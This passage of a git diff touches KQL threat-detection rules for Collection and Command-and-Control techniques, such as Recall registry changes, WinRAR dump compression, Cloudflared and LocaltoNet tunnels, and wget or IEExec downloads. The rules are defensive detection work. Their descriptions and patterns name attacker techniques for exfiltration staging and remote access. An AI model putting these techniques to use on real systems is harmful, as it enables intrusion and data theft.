"DeleteValue" and RegistryKey endswith "\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis" \ No newline at end of file diff --git a/KQL/rules/Collection/windows_recall_feature_enabled_registry.kql b/KQL/rules/Collection/windows_recall_feature_enabled_registry.kql index 6bbdf733..89c77c5d 100644 --- a/KQL/rules/Collection/windows_recall_feature_enabled_registry.kql +++ b/KQL/rules/Collection/windows_recall_feature_enabled_registry.kql @@ -1,14 +1,14 @@ -// Title: Windows Recall Feature Enabled - Registry -// Author: Sajid Nawaz Khan -// Date: 2024-06-02 -// Level: medium -// Description: Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by setting the value of "DisableAIDataAnalysis" to "0". -// Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. -// This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary. -// MITRE Tactic: Collection -// Tags: attack.collection, attack.t1113 -// False Positives: -// - Legitimate use/activation of Windows Recall - -DeviceRegistryEvents +// Title: Windows Recall Feature Enabled - Registry +// Author: Sajid Nawaz Khan +// Date: 2024-06-02 +// Level: medium +// Description: Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by setting the value of "DisableAIDataAnalysis" to "0". +// Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. +// This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1113 +// False Positives: +// - Legitimate use/activation of Windows Recall + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\Software\\Policies\\Microsoft\\Windows\\WindowsAI\\DisableAIDataAnalysis" \ No newline at end of file diff --git a/KQL/rules/Collection/windows_recall_feature_enabled_via_reg_exe.kql b/KQL/rules/Collection/windows_recall_feature_enabled_via_reg_exe.kql index fc2d0243..72599a22 100644 --- a/KQL/rules/Collection/windows_recall_feature_enabled_via_reg_exe.kql +++ b/KQL/rules/Collection/windows_recall_feature_enabled_via_reg_exe.kql @@ -1,15 +1,15 @@ -// Title: Windows Recall Feature Enabled Via Reg.EXE -// Author: Sajid Nawaz Khan -// Date: 2024-06-02 -// Level: medium -// Description: Detects the enabling of the Windows Recall feature via registry manipulation. -// Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" value, or setting it to 0. -// Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. -// This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary. -// MITRE Tactic: Collection -// Tags: attack.collection, attack.t1113 -// False Positives: -// - Legitimate use/activation of Windows Recall - -DeviceProcessEvents +// Title: Windows Recall Feature Enabled Via Reg.EXE +// Author: Sajid Nawaz Khan +// Date: 2024-06-02 +// Level: medium +// Description: Detects the enabling of the Windows Recall feature via registry manipulation. +// Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" value, or setting it to 0. +// Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. +// This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1113 +// False Positives: +// - Legitimate use/activation of Windows Recall + +DeviceProcessEvents | where (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "Microsoft\\Windows\\WindowsAI" and ProcessCommandLine contains "DisableAIDataAnalysis") and ((ProcessCommandLine contains "add" or ProcessCommandLine contains "0") or ProcessCommandLine contains "delete") \ No newline at end of file diff --git a/KQL/rules/Collection/winrar_compressing_dump_files.kql b/KQL/rules/Collection/winrar_compressing_dump_files.kql index a62b7e72..f1601036 100644 --- a/KQL/rules/Collection/winrar_compressing_dump_files.kql +++ b/KQL/rules/Collection/winrar_compressing_dump_files.kql @@ -1,13 +1,13 @@ -// Title: Winrar Compressing Dump Files -// Author: Florian Roth (Nextron Systems) -// Date: 2022-01-04 -// Level: medium -// Description: Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration. -// MITRE Tactic: Collection -// Tags: attack.collection, attack.t1560.001 -// False Positives: -// - Legitimate use of WinRAR with a command line in which ".dmp" or ".dump" appears accidentally -// - Legitimate use of WinRAR to compress WER ".dmp" files for troubleshooting - -DeviceProcessEvents +// Title: Winrar Compressing Dump Files +// Author: Florian Roth (Nextron Systems) +// Date: 2022-01-04 +// Level: medium +// Description: Detects execution of WinRAR in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1560.001 +// False Positives: +// - Legitimate use of WinRAR with a command line in which ".dmp" or ".dump" appears accidentally +// - Legitimate use of WinRAR to compress WER ".dmp" files for troubleshooting + +DeviceProcessEvents | where (ProcessCommandLine contains ".dmp" or ProcessCommandLine contains ".dump" or ProcessCommandLine contains ".hdmp") and ((FolderPath endswith "\\rar.exe" or FolderPath endswith "\\winrar.exe") or ProcessVersionInfoFileDescription =~ "Command line RAR") \ No newline at end of file diff --git a/KQL/rules/Collection/winrar_execution_in_non_standard_folder.kql b/KQL/rules/Collection/winrar_execution_in_non_standard_folder.kql index 1f8fb505..53b9ca49 100644 --- a/KQL/rules/Collection/winrar_execution_in_non_standard_folder.kql +++ b/KQL/rules/Collection/winrar_execution_in_non_standard_folder.kql @@ -1,12 +1,12 @@ -// Title: WinRAR Execution in Non-Standard Folder -// Author: Florian Roth (Nextron Systems), Tigzy -// Date: 2021-11-17 -// Level: medium -// Description: Detects a suspicious WinRAR execution in a folder which is not the default installation folder -// MITRE Tactic: Collection -// Tags: attack.collection, attack.t1560.001 -// False Positives: -// - Legitimate use of WinRAR in a folder of a software that bundles WinRAR - -DeviceProcessEvents +// Title: WinRAR Execution in Non-Standard Folder +// Author: Florian Roth (Nextron Systems), Tigzy +// Date: 2021-11-17 +// Level: medium +// Description: Detects a suspicious WinRAR execution in a folder which is not the default installation folder +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1560.001 +// False Positives: +// - Legitimate use of WinRAR in a folder of a software that bundles WinRAR + +DeviceProcessEvents | where ((FolderPath endswith "\\rar.exe" or FolderPath endswith "\\winrar.exe") or (ProcessVersionInfoFileDescription in~ ("Command line RAR", "WinRAR"))) and (not(((FolderPath contains ":\\Program Files (x86)\\WinRAR\\" or FolderPath contains ":\\Program Files\\WinRAR\\") or FolderPath endswith "\\UnRAR.exe"))) and (not(FolderPath contains ":\\Windows\\Temp\\")) \ No newline at end of file diff --git a/KQL/rules/Command and Control/adsi_cache_file_creation_by_uncommon_tool.kql b/KQL/rules/Command and Control/adsi_cache_file_creation_by_uncommon_tool.kql index cba2f4eb..e58ae69a 100644 --- a/KQL/rules/Command and Control/adsi_cache_file_creation_by_uncommon_tool.kql +++ b/KQL/rules/Command and Control/adsi_cache_file_creation_by_uncommon_tool.kql @@ -1,12 +1,12 @@ -// Title: ADSI-Cache File Creation By Uncommon Tool -// Author: xknow @xknow_infosec, Tim Shelton -// Date: 2019-03-24 -// Level: medium -// Description: Detects the creation of an "Active Directory Schema Cache File" (.sch) file by an uncommon tool. -// MITRE Tactic: Command and Control -// Tags: attack.t1001.003, attack.command-and-control -// False Positives: -// - Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc. - -DeviceFileEvents +// Title: ADSI-Cache File Creation By Uncommon Tool +// Author: xknow @xknow_infosec, Tim Shelton +// Date: 2019-03-24 +// Level: medium +// Description: Detects the creation of an "Active Directory Schema Cache File" (.sch) file by an uncommon tool. +// MITRE Tactic: Command and Control +// Tags: attack.t1001.003, attack.command-and-control +// False Positives: +// - Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc. + +DeviceFileEvents | where (FolderPath contains "\\Local\\Microsoft\\Windows\\SchCache\\" and FolderPath endswith ".sch") and (not((((InitiatingProcessFolderPath endswith ":\\Program Files\\Cylance\\Desktop\\CylanceSvc.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\CCM\\CcmExec.exe" or InitiatingProcessFolderPath endswith ":\\windows\\system32\\dllhost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\system32\\dsac.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\system32\\efsui.exe" or InitiatingProcessFolderPath endswith ":\\windows\\system32\\mmc.exe" or InitiatingProcessFolderPath endswith ":\\windows\\system32\\svchost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\wbem\\WmiPrvSE.exe" or InitiatingProcessFolderPath endswith ":\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe") or (InitiatingProcessFolderPath contains ":\\Windows\\ccmsetup\\autoupgrade\\ccmsetup" or InitiatingProcessFolderPath contains ":\\Program Files\\SentinelOne\\Sentinel Agent")) or ((InitiatingProcessFolderPath contains ":\\Program Files\\" and InitiatingProcessFolderPath contains "\\Microsoft Office") and InitiatingProcessFolderPath endswith "\\OUTLOOK.EXE")))) and (not((InitiatingProcessFolderPath endswith ":\\Program Files\\Citrix\\Receiver StoreFront\\Services\\DefaultDomainServices\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe" or InitiatingProcessFolderPath endswith "\\LANDesk\\LDCLient\\ldapwhoami.exe"))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/anydesk_temporary_artefact.kql b/KQL/rules/Command and Control/anydesk_temporary_artefact.kql index 1cfde36a..45ba1b42 100644 --- a/KQL/rules/Command and Control/anydesk_temporary_artefact.kql +++ b/KQL/rules/Command and Control/anydesk_temporary_artefact.kql @@ -1,14 +1,14 @@ -// Title: Anydesk Temporary Artefact -// Author: frack113 -// Date: 2022-02-11 -// Level: medium -// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. -// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. -// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002 -// False Positives: -// - Legitimate use - -DeviceFileEvents +// Title: Anydesk Temporary Artefact +// Author: frack113 +// Date: 2022-02-11 +// Level: medium +// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. +// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate use + +DeviceFileEvents | where FolderPath contains "\\AppData\\Roaming\\AnyDesk\\user.conf" or FolderPath contains "\\AppData\\Roaming\\AnyDesk\\system.conf" \ No newline at end of file diff --git a/KQL/rules/Command and Control/arbitrary_file_download_via_gfxdownloadwrapper_exe.kql b/KQL/rules/Command and Control/arbitrary_file_download_via_gfxdownloadwrapper_exe.kql index a91eace5..d724539f 100644 --- a/KQL/rules/Command and Control/arbitrary_file_download_via_gfxdownloadwrapper_exe.kql +++ b/KQL/rules/Command and Control/arbitrary_file_download_via_gfxdownloadwrapper_exe.kql @@ -1,10 +1,10 @@ -// Title: Arbitrary File Download Via GfxDownloadWrapper.EXE -// Author: Victor Sergeev, oscd.community -// Date: 2020-10-09 -// Level: medium -// Description: Detects execution of GfxDownloadWrapper.exe with a URL as an argument to download file. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105 - -DeviceProcessEvents +// Title: Arbitrary File Download Via GfxDownloadWrapper.EXE +// Author: Victor Sergeev, oscd.community +// Date: 2020-10-09 +// Level: medium +// Description: Detects execution of GfxDownloadWrapper.exe with a URL as an argument to download file. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceProcessEvents | where ((ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and FolderPath endswith "\\GfxDownloadWrapper.exe") and (not(ProcessCommandLine contains "https://gameplayapi.intel.com/")) \ No newline at end of file diff --git a/KQL/rules/Command and Control/cloudflared_portable_execution.kql b/KQL/rules/Command and Control/cloudflared_portable_execution.kql index f1e0969e..d99d96f1 100644 --- a/KQL/rules/Command and Control/cloudflared_portable_execution.kql +++ b/KQL/rules/Command and Control/cloudflared_portable_execution.kql @@ -1,12 +1,12 @@ -// Title: Cloudflared Portable Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-12-20 -// Level: medium -// Description: Detects the execution of the "cloudflared" binary from a non standard location. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1090.001 -// False Positives: -// - Legitimate usage of Cloudflared portable versions - -DeviceProcessEvents +// Title: Cloudflared Portable Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-12-20 +// Level: medium +// Description: Detects the execution of the "cloudflared" binary from a non standard location. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1090.001 +// False Positives: +// - Legitimate usage of Cloudflared portable versions + +DeviceProcessEvents | where FolderPath endswith "\\cloudflared.exe" and (not((FolderPath contains ":\\Program Files (x86)\\cloudflared\\" or FolderPath contains ":\\Program Files\\cloudflared\\"))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/cloudflared_quick_tunnel_execution.kql b/KQL/rules/Command and Control/cloudflared_quick_tunnel_execution.kql index b41427df..ff33f70f 100644 --- a/KQL/rules/Command and Control/cloudflared_quick_tunnel_execution.kql +++ b/KQL/rules/Command and Control/cloudflared_quick_tunnel_execution.kql @@ -1,14 +1,14 @@ -// Title: Cloudflared Quick Tunnel Execution -// Author: Sajid Nawaz Khan -// Date: 2023-12-20 -// Level: medium -// Description: Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB. -// The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com. -// The tool has been observed in use by threat groups including Akira ransomware. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1090.001 -// False Positives: -// - Legitimate usage of Cloudflare Quick Tunnel - -DeviceProcessEvents +// Title: Cloudflared Quick Tunnel Execution +// Author: Sajid Nawaz Khan +// Date: 2023-12-20 +// Level: medium +// Description: Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB. +// The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com. +// The tool has been observed in use by threat groups including Akira ransomware. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1090.001 +// False Positives: +// - Legitimate usage of Cloudflare Quick Tunnel + +DeviceProcessEvents | where (((FolderPath endswith "\\cloudflared.exe" or FolderPath endswith "\\cloudflared-windows-386.exe" or FolderPath endswith "\\cloudflared-windows-amd64.exe") or (SHA256 startswith "2fb6c04c4f95fb8d158af94c137f90ac820716deaf88d8ebec956254e046cb29" or SHA256 startswith "b3d21940a10fdef5e415ad70331ce257c24fe3bcf7722262302e0421791f87e8" or SHA256 startswith "1fbd8362b2d2d2e6a5750ae3db69cd1815e6c1d31da48a98b796450971a8e039" or SHA256 startswith "0409c9b12f9d0eda86e461ed9bdabeefb00172b26322079681a0bdf48e68dc28" or SHA256 startswith "7cfb411d04bac42ef93d1f0c93c0a481e38c6f4612b97ae89d4702595988edc7" or SHA256 startswith "5b3c2d846ab162dc6bc595cce3a49de5731afde5d6060be7066d21b013a28373" or SHA256 startswith "ce95df7f69664c3df19b76028e115931919a71517b776da7b42d353e2ff4a670" or SHA256 startswith "1293525a19cfe3bc8296b62fbfe19f083632ed644a1c18c10b045a1d3030d81a" or SHA256 startswith "af2b9161cfcb654b16408cd6b098afe9d1fb61a037d18d7090a119d4c0c8e0f0" or SHA256 startswith "39ddceb56a15798826a5fc4892fa2b474c444bb4d7a8bf2fa95e41cab10fa7a1" or SHA256 startswith "ccd11f2328023a0e7929e845d5b6e7bc783fb4650d65faef3ae090239d4bbce2" or SHA256 startswith "b6e5c5d2567ae8c69cc012ebcae30e6c9b5359d64a58d17ba75ec89f8bce71ac" or SHA256 startswith "f813484ea441404f18caad96f28138e8aaf0cb256163c09c2ab8a3acab87f69f" or SHA256 startswith "fc4a0802ab9c7409b892ca00636bec61e2acfc911bccfdeb9978b8ab5a2f828d" or SHA256 startswith "083150724b49604c8765c1ba19541fa260b133be0acb0647fcd936d81f054499" or SHA256 startswith "44303d6572956f28a0f2e4b188934fb9874f2584f5c81fa431a463cfbf28083b" or SHA256 startswith "5d38c46032a58e28ae5f7d174d8761ec3d64d186677f3ec53af5f51afb9bfd2f" or SHA256 startswith "e1e70fa42059911bc6685fafef957f9a73fc66f214d0704a9b932683a5204032" or SHA256 startswith "c01356092a365b84f84f0e66870bd1a05ba3feb53cafd973fa5fea2534bee234" or SHA256 startswith "b3f9c06151e30ee43d39e788a79cd918a314f24e04fe87f3de8272a2057b624f" or SHA256 startswith "cd81b2792f0739f473c31c9cb7cf2313154bfa28b839975802b90e8790bb5058" or SHA256 startswith "9ec7e6c8e1bfd883663d8d9d62c9e4f9ae373b731407181e32491b27a7218a2c" or SHA256 startswith "c2cfd23fdc6c0e1b1ffa0e545cbe556f18d11b362b4a89ba0713f6ab01c4827f" or SHA256 startswith "53f8adbd76c0eb16f5e43cadde422474d8a06f9c8f959389c1930042ad8beaa5" or SHA256 startswith "648c8d2f8001c113d2986dd00b7bbd181593d462bef73522cee212c4f71f95b3" or SHA256 startswith "ae047e2095e46c3f9c518b2be67ec753f4f0aad23b261a361fcb6144dcdb63b4" or SHA256 startswith "3153d2baa462978dd22ab33d1c2274ecc88c200225d6a3327f98d5b752d08f5c" or SHA256 startswith "f49cde976e628012c9db73e1c8d76081944ecf2297cdafeb78bb13290da274c4" or SHA256 startswith "d2513e58bb03ccc83affde685c6ef987924c37ce6707d8e9857e2524b0d7e90f" or SHA256 startswith "bb67c7623ba92fe64ffd9816b8d5b3b1ea3013960a30bd4cf6e295b3eb5b1bad" or SHA256 startswith "b34b3c3a91e3165d1481f0b3ec23eab93a1cfba94345a6cbfe5b18ddbd48eac7" or SHA256 startswith "f7848034e010d55f15e474ca998f96391e320ff29b00cfcc4c5e536529703e75" or SHA256 startswith "b6fc9493778cbe3bfc062d73f5cc604bc0ff058bc5e5dc6aac87f3a4008b54b6" or SHA256 startswith "f5c5e962577e2293c4ad10603816dce7cc273585969615fbf4e4bfa9eaff1688" or SHA256 startswith "d14c52d9220b606f428a8fe9f7c108b0d6f14cf71e7384749e98e6a95962e68f" or SHA256 startswith "d3a0e1a79158f3985cd49607ebe0cdfcc49cb9af96b8f43aefd0cdfe2f22e663" or SHA256 startswith "2fbbfc8299537ff80cadf9d0e27c223fe0ccb9052bf9d8763ad717bbfa521c77" or SHA256 startswith "19074674c6fbdaa573b3081745e5e26144fdf7a086d14e0e220d1814f1f13078")) and ((ProcessCommandLine contains "-url" and ProcessCommandLine contains "tunnel") or (ProcessCommandLine contains ".exe -url" or ProcessCommandLine contains ".exe --url"))) or (ProcessCommandLine contains "-url" and ProcessCommandLine contains "-no-autoupdate") \ No newline at end of file diff --git a/KQL/rules/Command and Control/cloudflared_tunnel_connections_cleanup.kql b/KQL/rules/Command and Control/cloudflared_tunnel_connections_cleanup.kql index a3a203ff..5eef217c 100644 --- a/KQL/rules/Command and Control/cloudflared_tunnel_connections_cleanup.kql +++ b/KQL/rules/Command and Control/cloudflared_tunnel_connections_cleanup.kql @@ -1,12 +1,12 @@ -// Title: Cloudflared Tunnel Connections Cleanup -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-17 -// Level: medium -// Description: Detects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to cleanup tunnel connections. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1102, attack.t1090, attack.t1572 -// False Positives: -// - Legitimate usage of Cloudflared. - -DeviceProcessEvents +// Title: Cloudflared Tunnel Connections Cleanup +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-17 +// Level: medium +// Description: Detects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to cleanup tunnel connections. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1102, attack.t1090, attack.t1572 +// False Positives: +// - Legitimate usage of Cloudflared. + +DeviceProcessEvents | where (ProcessCommandLine contains "-config " or ProcessCommandLine contains "-connector-id ") and (ProcessCommandLine contains " tunnel " and ProcessCommandLine contains "cleanup ") \ No newline at end of file diff --git a/KQL/rules/Command and Control/cloudflared_tunnel_execution.kql b/KQL/rules/Command and Control/cloudflared_tunnel_execution.kql index 391c60ba..491b6dac 100644 --- a/KQL/rules/Command and Control/cloudflared_tunnel_execution.kql +++ b/KQL/rules/Command and Control/cloudflared_tunnel_execution.kql @@ -1,12 +1,12 @@ -// Title: Cloudflared Tunnel Execution -// Author: Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-17 -// Level: medium -// Description: Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1102, attack.t1090, attack.t1572 -// False Positives: -// - Legitimate usage of Cloudflared tunnel. - -DeviceProcessEvents +// Title: Cloudflared Tunnel Execution +// Author: Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-17 +// Level: medium +// Description: Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1102, attack.t1090, attack.t1572 +// False Positives: +// - Legitimate usage of Cloudflared tunnel. + +DeviceProcessEvents | where (ProcessCommandLine contains "-config " or ProcessCommandLine contains "-credentials-contents " or ProcessCommandLine contains "-credentials-file " or ProcessCommandLine contains "-token ") and (ProcessCommandLine contains " tunnel " and ProcessCommandLine contains " run ") \ No newline at end of file diff --git a/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated.kql b/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated.kql index fc272418..32346cc3 100644 --- a/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated.kql +++ b/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated.kql @@ -1,14 +1,14 @@ -// Title: Communication To LocaltoNet Tunneling Service Initiated -// Author: Andreas Braathen (mnemonic.io) -// Date: 2024-06-17 -// Level: high -// Description: Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. -// LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. -// Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1572, attack.t1090, attack.t1102 -// False Positives: -// - Legitimate use of the LocaltoNet service. - -DeviceNetworkEvents +// Title: Communication To LocaltoNet Tunneling Service Initiated +// Author: Andreas Braathen (mnemonic.io) +// Date: 2024-06-17 +// Level: high +// Description: Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. +// LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. +// Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1572, attack.t1090, attack.t1102 +// False Positives: +// - Legitimate use of the LocaltoNet service. + +DeviceNetworkEvents | where RemoteUrl endswith ".localto.net" or RemoteUrl endswith ".localtonet.com" \ No newline at end of file diff --git a/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated_linux.kql b/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated_linux.kql index 30f7151d..47020b41 100644 --- a/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated_linux.kql +++ b/KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated_linux.kql @@ -1,14 +1,14 @@ -// Title: Communication To LocaltoNet Tunneling Service Initiated - Linux -// Author: Andreas Braathen (mnemonic.io) -// Date: 2024-06-17 -// Level: high -// Description: Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. -// LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. -// Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1572, attack.t1090, attack.t1102 -// False Positives: -// - Legitimate use of the LocaltoNet service. - -DeviceNetworkEvents +// Title: Communication To LocaltoNet Tunneling Service Initiated - Linux +// Author: Andreas Braathen (mnemonic.io) +// Date: 2024-06-17 +// Level: high +// Description: Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. +// LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. +// Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1572, attack.t1090, attack.t1102 +// False Positives: +// - Legitimate use of the LocaltoNet service. + +DeviceNetworkEvents | where RemoteUrl endswith ".localto.net" or RemoteUrl endswith ".localtonet.com" \ No newline at end of file diff --git a/KQL/rules/Command and Control/curl_usage_on_linux.kql b/KQL/rules/Command and Control/curl_usage_on_linux.kql index ea57bd5a..b8b7fd60 100644 --- a/KQL/rules/Command and Control/curl_usage_on_linux.kql +++ b/KQL/rules/Command and Control/curl_usage_on_linux.kql @@ -1,13 +1,13 @@ -// Title: Curl Usage on Linux -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-15 -// Level: low -// Description: Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105 -// False Positives: -// - Scripts created by developers and admins -// - Administrative activity - -DeviceProcessEvents +// Title: Curl Usage on Linux +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-15 +// Level: low +// Description: Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 +// False Positives: +// - Scripts created by developers and admins +// - Administrative activity + +DeviceProcessEvents | where FolderPath endswith "/curl" \ No newline at end of file diff --git a/KQL/rules/Command and Control/download_file_to_potentially_suspicious_directory_via_wget.kql b/KQL/rules/Command and Control/download_file_to_potentially_suspicious_directory_via_wget.kql index f6aa8597..e53e2981 100644 --- a/KQL/rules/Command and Control/download_file_to_potentially_suspicious_directory_via_wget.kql +++ b/KQL/rules/Command and Control/download_file_to_potentially_suspicious_directory_via_wget.kql @@ -1,10 +1,10 @@ -// Title: Download File To Potentially Suspicious Directory Via Wget -// Author: Joseliyo Sanchez, @Joseliyo_Jstnk -// Date: 2023-06-02 -// Level: medium -// Description: Detects the use of wget to download content to a suspicious directory -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105 - -DeviceProcessEvents +// Title: Download File To Potentially Suspicious Directory Via Wget +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-06-02 +// Level: medium +// Description: Detects the use of wget to download content to a suspicious directory +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceProcessEvents | where FolderPath endswith "/wget" and (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "/tmp/" \ No newline at end of file diff --git a/KQL/rules/Command and Control/file_download_and_execution_via_ieexec_exe.kql b/KQL/rules/Command and Control/file_download_and_execution_via_ieexec_exe.kql index 90a1fc9b..d208417f 100644 --- a/KQL/rules/Command and Control/file_download_and_execution_via_ieexec_exe.kql +++ b/KQL/rules/Command and Control/file_download_and_execution_via_ieexec_exe.kql @@ -1,10 +1,10 @@ -// Title: File Download And Execution Via IEExec.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-05-16 -// Level: high -// Description: Detects execution of the IEExec utility to download and execute files -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105 - -DeviceProcessEvents +// Title: File Download And Execution Via IEExec.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-05-16 +// Level: high +// Description: Detects execution of the IEExec utility to download and execute files +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceProcessEvents | where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\IEExec.exe" or ProcessVersionInfoOriginalFileName =~ "IEExec.exe") \ No newline at end of file diff --git a/KQL/rules/Command and Control/file_download_from_browser_process_via_inline_url.kql b/KQL/rules/Command and Control/file_download_from_browser_process_via_inline_url.kql index 181b3812..1eb1bf8c 100644 --- a/KQL/rules/Command and Control/file_download_from_browser_process_via_inline_url.kql +++ b/KQL/rules/Command and Control/file_download_from_browser_process_via_inline_url.kql @@ -1,10 +1,10 @@ -// Title: File Download From Browser Process Via Inline URL -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-01-11 -// Level: medium -// Description: Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105 - -DeviceProcessEvents +// Title: File Download From Browser Process Via Inline URL +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-01-11 +// Level: medium +// Description: Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state. +// MITRE Tactic: 